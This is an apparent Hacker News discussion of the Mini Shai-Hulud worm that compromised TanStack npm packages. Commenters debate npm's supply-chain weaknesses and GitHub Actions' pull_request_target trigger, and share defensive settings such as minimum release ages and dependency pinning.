Once again, Shai-Hulud wrecking havock in the Javascript and Typescript ecosystems via NPM.

One of the worst ecosystems that has been brought into the software industry and it is almost always via NPM. Not even Cargo (Rust) or go mod (Golang) get as many attacks because at least with the latter, they encourage you to use the standard library.

Both Javascript and Typescript have none and want you to import hundreds of libraries, increasing the risk of a supply chain attack.

At this point, JS and TS are considered harmful.

by rvz

5/11/2026 at 10:21:09 PM

I don't really buy this. NPM is targeted because it's the largest attack surface with the biggest payoff for a successful attack.

Other ecosystems package managers are really no different in a lot of ways.

NPM's biggest fault is just it allows post/pre install scripts by default without user intervention.

by robertjpayne

5/14/2026 at 9:02:21 PM

Your last two sentences are contradictory. That is a very significant difference.

Another significant difference is how useful the standard library of each language is, so that you can avoid 3rd party libraries.

Also the tendency in the JS ecosystem to break libraries into tiny parts, because it helps or historically helped to ship less code to the user.

by ric2b

5/11/2026 at 11:54:52 PM

Look I love Rust and hate Typescript. But if NPM didn't exist, wouldn't the attackers just hit the next most popular supply chain? Cargo isn't immune to this, as much as I love Rust and wish more shops used it.

by devilsdata

5/11/2026 at 10:16:15 PM

The Standard C library is also very small. Even though there’s POSIX, for anything that’s not system programming, you will be using libraries.

The difference is that the usual C libraries don’t split the project into small molecules for no good reasons. You have to be as big as GTK to start splitting library in my opinion.

by skydhash

5/11/2026 at 10:15:03 PM

If cargo was as popular as npm, the same issues would surface.

by squidsoup

5/14/2026 at 8:59:23 PM

No, because Rust has a standard library that covers the basics enough to not push you to start adding decencies as quickly.

by ric2b

5/11/2026 at 11:21:36 PM

> Both Javascript and Typescript have none and want you to import hundreds of libraries

There are plenty of very popular packages with zero dependencies like Hono or Zod. If you decide to blindly install something with hundreds of deps it's on you.

That said, I do agree the JS standard library should provide a lot more than it does now.

by pier25

5/11/2026 at 10:29:55 PM

I wonder whether NPM has surpassed the costs of the billion dollar mistake, null references. NPM hasn't been around as long, but the industry is much bigger today than it was when systems languages were dominant.

by AlotOfReading

5/12/2026 at 8:33:40 AM

It's not failure of npm/js ecosystem. It's Github Actions failure that allowed this to happen.

by febusravenga

5/11/2026 at 11:21:11 PM

Python had these too, no ecosystem is safe.

by silverwind

5/12/2026 at 10:22:31 AM

pull_request_target is really a landmine.

by LelouBil

5/12/2026 at 11:23:16 AM

I'm shocked that big open-source projects are even using it. I was reading through the Actions documentation recently and it did make it pretty clear that you should not be using it for untrusted code.

>Running untrusted code on the pull_request_target trigger may lead to security vulnerabilities. These vulnerabilities include cache poisoning and granting unintended access to write privileges or secrets.

https://docs.github.com/en/actions/reference/workflows-and-a...

by Hamuko

5/12/2026 at 12:28:38 PM

I feel like GitHub should deprecate it and replace it with pull_request_untrusted or something and have every shareable aspect (like cache or secrets) an explicit boolean opt-in

by LelouBil

5/12/2026 at 10:21:11 AM

NPM is a never-ending joy of daily what-the-fudges.

It also serves as a distraction for other languages - ruby and python can lean back with a smile, wisely pointing at how utterly awful NPM is performing here.

by shevy-java

5/12/2026 at 5:22:49 PM

wow

by getrundoc

5/11/2026 at 10:59:57 PM

Ah shit, here we go again

by idoxer

5/12/2026 at 5:34:32 AM

Yet another day where 'pull_request_target` is allowed to exist and cause tons of pain. They really ought to kill it off by now.

by anonymousab

5/11/2026 at 10:00:14 PM

Reminder to secure your npm environments.

https://gajus.com/blog/3-pnpm-settings-to-protect-yourself-f...

Just a handful of settings to save a whole lot of trouble.

by gajus

5/11/2026 at 10:33:54 PM

Wild claim that setting the minimum age to 7 days will result in me "never" getting a supply chain npm vuln.

by arcza

5/11/2026 at 10:55:14 PM

In this case it would have, because the compromised packages were pulled within 3 hours.

by andix

5/11/2026 at 11:07:58 PM

This sort of mitigation seems like it makes sense in the short term, but it seems like it would only work as long as most people don't do it. If everyone has this set to seven days, it will take seven days plus three hours to get things yanked, and then there will be people who will set to 14 days...

by saghm

5/11/2026 at 11:21:14 PM

No, its still a very useful mitigation tool.

1) Package owners will often realise they've been hacked quickly, since there are releases they never authorised. This gives them plenty of time to raise the alarm and yank the packages

2. Independent security researchers and other automated vulnerability scans will still be checking the latest releases even if users aren't using them

Yes it's not a perfect defense but it would help a lot.

by worble

5/12/2026 at 12:10:45 AM

These malicious packages are being caught by the authors, and by automated package security scanners, not just by end users. npm should start setting this 7 day cooldown as default.

by omcnoe

5/12/2026 at 12:44:19 AM

Even 12 hours would probably be enough. Those automatic malware scanning companies are getting really fast.

by andix

5/12/2026 at 5:33:08 AM

Some people would set up tooling to look for compromises the moment they get published. What's neat about this is that as an attacker you have no way to determine beforehand whether you'll get caught by this. So you would run your attack, it would lead to a compromised package being published, then the world would get a chance to look at it and see if they can detect the issue with it. This would of course lead to attackers being a lot sneakier. But I think due to the opaque nature of what checks people are running against packages and what they might notice, a much smaller number of attacks would make it through. Of course the ones that did by definition would be the ones that were impossible to detect and would thus stick around a lot longer.

by bmandale

5/12/2026 at 3:46:53 AM

Mine's set to 1 day (seems to be enough from all the cases we've learned about), I got you.

Also seems like this attack and most others were caught by automated tooling from 3rd parties

by conradkay

5/12/2026 at 2:17:51 AM

you are betting that the package is popular, has enough eyes to mitigate attack in 7 days. attackers could also target unpopular packages for long game

by mayama

5/11/2026 at 11:04:30 PM

There is a “fresh” in there

by pastel8739

5/12/2026 at 1:47:53 AM

In aube you get all this out of the box plus a lifecycle jail (next MV will have that on by default) and defaults to trustPolicy=no-downgrade (would not have helped here but still a good default).

It has the strongest security posture of any node pm.

https://aube.en.dev/security.html#jailed-lifecycle-scripts

by jdxcode

5/12/2026 at 5:30:10 AM

Heads up: Your website at en.dev says you're a one-person open source company. That immediately ruled out any of your tools for me and my team; no matter how great they may be, a single developer is a supply chain risk. I wholeheartedly recommend enlarging the team.

by 9dev

5/12/2026 at 2:02:21 AM

What a pleasant surprise to see jdx within comments! I was actually using mise and found aube and decided to publish it on hackernews, I found it really cool!

Though a bit sad that it hadn't received traction back then but I must admit jdx that a lot of the work that you do is really cool.

Also I am happy to know that you are finally able to work on Open source full time, I am glad that I can use open source software created by (in my opinion generous) people like you too, mise is awesome :-D

https://news.ycombinator.com/item?id=48012248

by Imustaskforhelp

5/11/2026 at 10:04:41 PM

Isn't this article wrong about npm minumum release age. 1. The config is min-release-age. 2. For some reason they have chosen to make it days instead of minutes: https://docs.npmjs.com/cli/v11/using-npm/config#min-release-...

Completely unforced fragmentation of the dependency manager space imo

by Narretz

5/11/2026 at 10:08:11 PM

This confused me too, until I realized that the article is about pnpm, not npm (pnpm reads .npmrc for some reason, despite not having the same options as npm)

On a related note, it seems to be impossible to find the documentation of min-release-age by googling it. Very annoying.

by bakugo

5/11/2026 at 11:33:35 PM

I just set this up for npm, here's the command that worked for me:

npm config set min-release-age 7

The '7' is days. This is the only format that worked for me, just a single integer number of days.

Confirmed by trying to install the latest version of React 19.2.6 (published 5 days ago as of the time of this comment). It failed with a comment confirming that it could not find such a version published before a week ago.

by davnicwil

5/12/2026 at 12:33:48 AM

Also `allow-git=none` for npm v11+: https://github.blog/changelog/2026-02-18-npm-bulk-trusted-pu...

by arkon_hn

5/11/2026 at 10:06:21 PM

And absolutely pin, pin, pin, ALL your dependencies.

If I see a package version dependency that looks like this: ^1.0.0 or even this: "*", then stop reading, pin it to a secure version immediately.

by rvz

5/11/2026 at 10:10:01 PM

Npm's package-lock.json already handles pinning everything to exact versions, including subdependencies. Pinning exact versions in package.json doesn't affect your subdependencies.

by AgentME

5/12/2026 at 2:05:51 AM

You aren't wrong. However, this article does offer some additional advice on this matter, and some potential reasons why it might still be desirable to pin your deps in package.json.

https://docs.renovatebot.com/dependency-pinning/#pinning-dep...

Some exerts:

> If a lock file gets out of sync with its package.json, it can no longer be guaranteed to lock anything, and the package.json will be the source of truth for installs.

> provides much less visibility than package.json, because it's not designed to be human readable and is quite dense.

> If the package.json has a range, and a new in-range version is released that would break the build, then essentially your package.json is in a state of "broken", even if the lock file is still holding things together.

by beart

5/11/2026 at 11:23:11 PM

Or help distributions do the manual process of packaging - which involves at least rudimentary security checks - so they can ship newer versions faster.

And then use distro packages.

(I'm not accepting distro fragmentation as counterargument. With containerization the distro is something you can choose. Choose one, help there, and use it everywhere.)

by eqvinox

5/11/2026 at 11:23:00 PM

Are you talking about in package.json? What's your threat model? That's what the lock file is for, which also pins transitive dependencies, which is just as crucial. Now what's actually insecure is if you don't commit the lockfile. and if you don't do `npm ci`.

I think `npx` might pull down new versions, too? I wish npm worked more like Elixir where updating the lock file was an explicit command, and everything else used the lock file directly.

by losvedir

5/11/2026 at 10:10:20 PM

its so wild to have seen this advice reverse course over the past year.

it used to be that projects that pinned deps were called out as being less secure due to not being able to receive updates without a publish.

different times, different threat model I suppose

by jonchurch_

5/11/2026 at 10:56:57 PM

> it used to be that projects that pinned deps were called out as being less secure due to not being able to receive updates without a publish.

This is still the right advice for libraries. For security it doesn’t matter a whole lot anymore as package managers can force the transitive dependencies version, but it allows for much better transitive dependency de duplication.

For non-libraries it doesn’t matter as the exact versions get pinned in the package-lock.

by n_e

5/11/2026 at 10:13:57 PM

I've been collecting things you can't pin:

- Python inline dependencies in PEP-0723, which you can pin with a==1.0, but can't be hash-pinned afaik.

- The bin package manager lets you pin binaries, but they aren't hash-pinned either.

- The pants build tool suggests vendoring a get-pants.sh script[0] but it downloads the latest. Even if you pass it a version, it doesn't do any checks on the version number and just installs it to ~/.local/bin

[0]: https://github.com/pantsbuild/setup/blob/gh-pages/get-pants....

by captn3m0

5/12/2026 at 9:41:09 AM

Unfortunately there is currently an issue in pnpm that makes `minimumReleaseAge` difficult: https://github.com/pnpm/pnpm/issues/11068

by mebcitto

5/11/2026 at 9:08:25 PM

The Mini Shai-Hulud worm is actively compromising legitimate npm packages by hijacking CI/CD pipelines and stealing developer secrets. StepSecurity's OSS Package Security Feed first detected the attack in official @tanstack packages and is tracking its spread across the ecosystem in real time.

by varunsharma07

5/11/2026 at 9:51:23 PM

How did you guys detect it? Do you use it internally or do you monitor popular packages?

by janice1999

5/12/2026 at 4:47:00 PM

We have built an AI Package Analyst https://app.stepsecurity.io/oss-security-feed and also monitor them using https://github.com/step-security/harden-runner for runtime behavior.

by varunsharma07

5/12/2026 at 3:19:56 PM

[flagged]

by lacymorrow

5/12/2026 at 8:59:54 PM

[flagged]

by squid-protocol

5/12/2026 at 1:31:21 AM

[flagged]

by omji-krypto

5/12/2026 at 8:13:11 AM

[dead]

by tornikeo

5/12/2026 at 1:49:47 PM

[dead]

by vorsken

5/12/2026 at 4:15:15 PM

[flagged]

by luisb_24

5/12/2026 at 8:00:30 AM

[dead]

by ramon156

5/12/2026 at 11:19:37 AM

[flagged]

by openclawclub

5/12/2026 at 4:46:23 PM

[dead]

by Damianf19

5/12/2026 at 3:12:49 AM

[dead]

by cavemanDigAI

5/12/2026 at 1:54:42 AM

[flagged]

by Amber-chen

5/12/2026 at 11:39:48 AM

[dead]

by Serhii-Set

5/12/2026 at 7:04:59 AM

[dead]

by Charlotte_Wang

5/11/2026 at 10:22:54 PM

TanStack? Jia Tan? Who is falling for this???

by nathanmills

5/11/2026 at 11:21:48 PM

Can you explain further? TanStack has popped up in our apps and I don't know why I should not be falling for this or what exactly the "this" is that is being fallen for.

by treis

5/12/2026 at 12:49:02 AM

It's a joke that apparently wasn't well received by HN.

by nathanmills

5/11/2026 at 10:40:26 PM

its a cult in react web dev circles. Just be glad that you never had to encounter devs who insist that everything must be on "tan" stack.

by darepublic

5/11/2026 at 10:51:07 PM

React Query is great. I’ve used his router and table component as well. IMO his stuff became popular on merit more than some cargo culting à la redux

by u_fucking_dork

5/11/2026 at 11:38:49 PM

as someone who encountered this cargo culted at a number of start ups -- I beg to differ. React Query I will always pass on. the other lesser known hits of tanstack -- won't even consider.

by darepublic

5/12/2026 at 1:22:51 AM

React Query I've managed to avoid but it's really a cache + promise hook, it's fairly versatile.

Tanstack Start / Router are pretty great coming from nextjs, and not limited to React either.

by c-hendricks

5/14/2026 at 11:13:09 AM

Nah there are better cache plus promise hook libs than react query that don't try to sell you courses or bump the major version several times and preach that developers can't handle fetch data logic. It's the monetization of small helpful lib by a megalomaniac

by darepublic

5/12/2026 at 1:29:07 AM

Yeah and it’s also ridiculous. They have so many bloated micro-libraries, they have a “headless range” library for controlling ranges and sliders that is marketed as being tiny at only 10kb. And their website is full of glitches and rendering bugs and it takes multiple seconds to navigate pages.

by nothinkjustai

5/11/2026 at 11:01:11 PM

[dead]

by draw_down

5/11/2026 at 9:51:18 PM

So when do we call out NPM as an easy supply chain vector and also Microsoft's ownership of NPM and their prioritisation of AI at any cost.

NPM is the windows of package managers right now.

by ljm

5/11/2026 at 10:03:09 PM

People have for years. The real question is do people enjoy not putting any thought into their super convenient JavaScript stack too much to actually do anything about it. Delaying updating to new packages assuming the vulnerability will be discovered in two days or whatever is putting a knee brace on a leg that needs to be amputated. Sooner or later there will be a vulnerability good enough to not be caught in a couple days, or a zero-day damaging enough that not updating immediately is a huge risk. Assuming they won’t be in anything critical enough to disastrously compromise your stack is wishful thinking at its finest.

by DrewADesign

5/11/2026 at 10:18:18 PM

The part that always gets me is I tend to only install a few packages like React and maybe some kind of data access layer. But you let that recurse down a few levels and suddenly you've installed a thousand packages, some of them hopelessly obsolete, some of them for patently stupid things that are 1 line of code, etc, etc. I.E. you can't choose to be thoughtful if the main entry points into the language are all built on a pile of garbage.

by svachalek

5/12/2026 at 12:28:11 AM

Oh yeah, for sure. The problem (mostly) isn’t people installing packages willy-nilly: it’s that the attack surface is fractal, which is just plain nuts.

by DrewADesign

5/11/2026 at 9:59:26 PM

Now that npm supports --before, yarn supports npmMinimumAge, and pnpm supports minimumReleaseAge, it's quite possible to stay safe and avoid acciasional bleeding-edge upgrades. Stay a couple months into the past, give testers time to look at newer releases and vet their safety (or report an exploit attempt).

by nine_k

5/11/2026 at 10:53:30 PM

npm's immaturity is arguably demonstrated by the fact it is always catching up.

Please correct me if I'm wrong but signed packages are still impractical in NPM which is why supply chain attacks still work by editing existing versions or pushing new point releases without a signature.

Or if you put all of the credentials in GitHub actions which is even more trivially exploitable through the actions marketplace because it is just git with a thin proxy, you have an even wider attack vector

by ljm

5/11/2026 at 10:07:47 PM

--before doesn't save you globally, only min-release-age does, which is in npm since March iirc.

by Narretz

5/12/2026 at 4:47:00 AM

The nogil work has been years in the making. Curious how this impacts existing C extensions that relied on GIL guarantees.

by Miles_Stone

5/12/2026 at 12:18:51 AM

I've got claude to throw this together to try an help stem the flow. Obviously verify yourself but it will scan your machine to try and find any of the mentioned compromised packages: https://github.com/PaulSinghDev/tanstack-shai-hulud-fix

by makingstuffs

5/12/2026 at 1:33:18 AM

Not sure why the downvotes, it’s a quick tool? Yes it’s a ‘vibe code’ but it’s better than nothing and at least will flag if you need to do anything — verified myself.

by makingstuffs

5/12/2026 at 10:30:57 AM

I wasn’t affected because TanStack doesn’t feel like the juice is worth the squeeze.

TanStack is so fragile and verbose just to ensure type safety allegedly.

Debugging any decent piece of software alias usage in large applications feels nightmarish.

It is still JavaScript even when it is called TypeScript. All attempts to go way beyond meta type systems by adding more and more additional strict formats make things painful. JS ain’t Java.

TanStack is a cool idea and I value their enthusiasm. However, I abandoned their stack because TS, ZOD, pnpm are a very fragile hard to debug or understand combination and extreme update and upgrade hell.

Pydantic for types is kinda the same and seasoned devs use it for the entry and exit points. The rest is simply Python and here NumPy and the likes.

TanStack is no way saver than npm. No one understands TanStack. Sorry to break it to you. It is security theater and developer hell.

I liked the Table part - best ever, but customization is so complicated due to type enforcement that isn’t inherently enforced by the compiler, that I will never again consider it.

by _the_inflator

5/12/2026 at 10:38:51 AM

> No one understands TanStack. Sorry to break it to you.

Damn, all these years of using TanStack libs successfully, and I had to learn it here that I don't understand them.

by ervine

5/12/2026 at 10:55:43 AM

> TanStack is no way saver than npm. No one understands TanStack.

Pandas is also in no way safer than pip. Because pandas is a library and pip is a package manager and that comparison makes no sense lmao. It sounds like you maybe don't really get or use typescript and don't even really use like basic mypy style types in python (or don't get the difference between what a zod/pydantic validator does vs what a mypy/typescript type system does - zod is also only on the boundary). Which is OK but but there's a difference between not getting why a stack is useful or not having experience with it versus confidently and comically declaring that nobody else understands types either while seeming not understanding what any of the parts here do

by vikramkr